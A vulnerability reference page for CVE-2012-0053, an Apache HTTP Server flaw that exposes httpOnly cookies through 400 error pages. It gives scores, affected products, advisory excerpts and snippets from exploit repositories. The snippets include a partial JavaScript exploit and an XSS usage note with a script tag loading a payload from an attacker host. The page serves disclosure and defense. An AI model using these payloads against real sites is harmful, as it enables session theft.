Published: 28/01/2012 Updated: 07/11/2023

CVSS v2 Base Score: 4.3 | Impact Score: 2.9 | Exploitability Score: 8.6

VMScore: 436

Vector: AV:N/AC:M/Au:N/C:P/I:N/A:N

protocol.c in the Apache HTTP Server 2.2.x up to and including 2.2.21 does not properly restrict header information during construction of Bad Request (aka 400) error documents, which allows remote malicious users to obtain the values of HTTPOnly cookies via vectors involving a (1) long or (2) malformed header in conjunction with crafted web script.

Vulnerable Product	Search on Vulmon	Subscribe to Product
apache http server
debian debian linux 5.0
debian debian linux 7.0
debian debian linux 6.0
opensuse opensuse 11.4
suse linux enterprise software development kit 10
suse linux enterprise server 10
redhat enterprise linux desktop 6.0
redhat enterprise linux server 6.0
redhat enterprise linux workstation 6.0
redhat storage 2.0
redhat enterprise linux eus 6.2
redhat jboss_enterprise_web_server 1.0.0

Several security issues were fixed in the Apache HTTP Server ...

Synopsis Moderate: httpd security update Type/Severity Security Advisory: Moderate Topic Updated httpd packages that fix multiple security issues are now availablefor Red Hat Enterprise Linux 6The Red Hat Security Response Team has rated this update as having moderatesecurity impact Common Vulnerability S ...

Synopsis Moderate: httpd security update Type/Severity Security Advisory: Moderate Topic Updated httpd packages that fix multiple security issues are now availablefor Red Hat Enterprise Linux 5The Red Hat Security Response Team has rated this update as having moderatesecurity impact Common Vulnerability S ...

Synopsis Moderate: httpd security and bug fix update Type/Severity Security Advisory: Moderate Topic Updated httpd packages that fix multiple security issues and one bug arenow available for JBoss Enterprise Web Server 102 for Red Hat EnterpriseLinux 5 and 6The Red Hat Security Response Team has rated th ...

It was discovered that the fix for CVE-2011-3368 did not completely address the problem An attacker could bypass the fix and make a reverse proxy connect to an arbitrary server not directly accessible to the attacker by sending an HTTP version 09 request, or by using a specially-crafted URI (CVE-2011-3639, CVE-2011-4317) The httpd server include ...

// Source: gistgithubcom/1955a1c28324d4724b7b/7fe51f2a66c1d4a40a736540b3ad3fde02b7fb08 // Most browsers limit cookies to 4k characters, so we need multiple function setCookies (good) { // Construct string for cookie value var str = ""; for (var i=0; i< 819; i++) { str += "x"; } // Set cookies for (i = 0; ...

Demo of Apache httpOnly Cookie Disclosure Exploit CVE2012 0053

CVE20120053Demo Demo of Apache httpOnly Cookie Disclosure Exploit CVE2012 0053 This demo desmostrates the vunerability of apache registered at CVE: 2012-0053 More info at: accessredhatcom/security/cve/CVE-2012-0053 The code of exploit can be found here: wwwexploit-dbcom/exploits/18442/ The video of this demo can found at Youtube: youtube/Hrt32bPuxBA

Exploitation for XSS

xss_payloads Payloads for practical exploitation of cross site scripting Usage Find XSS vuln in your app Get PoC exploit: alert(1) etc Host these payloads somewhere Use vuln to pull one of these payloads into the app <script src="attackerip/filejs"></script> Profit js vs php files Some of the files are plain JavaScript js files,

Pentest Scripts for Apache Vulnerabilities

Apache-Vulns Pentest Scripts for Apache Vulnerabilities apacheScanpy The purpose of this script is to enable pentesters to quickly check which CVE-IDs apply to a particular Apache version apacheScan comes with a text file which contains all CVE-IDs taken from [httpdapacheorg] (httpdapacheorg) The python script simply retrieves the CVE-IDs that apply

CVE-2012-0053

Vulnerability Summary

Vulnerability Trend

Vendor Advisories

Exploits

Github Repositories

References

Vulmon Search

About

Products

Connect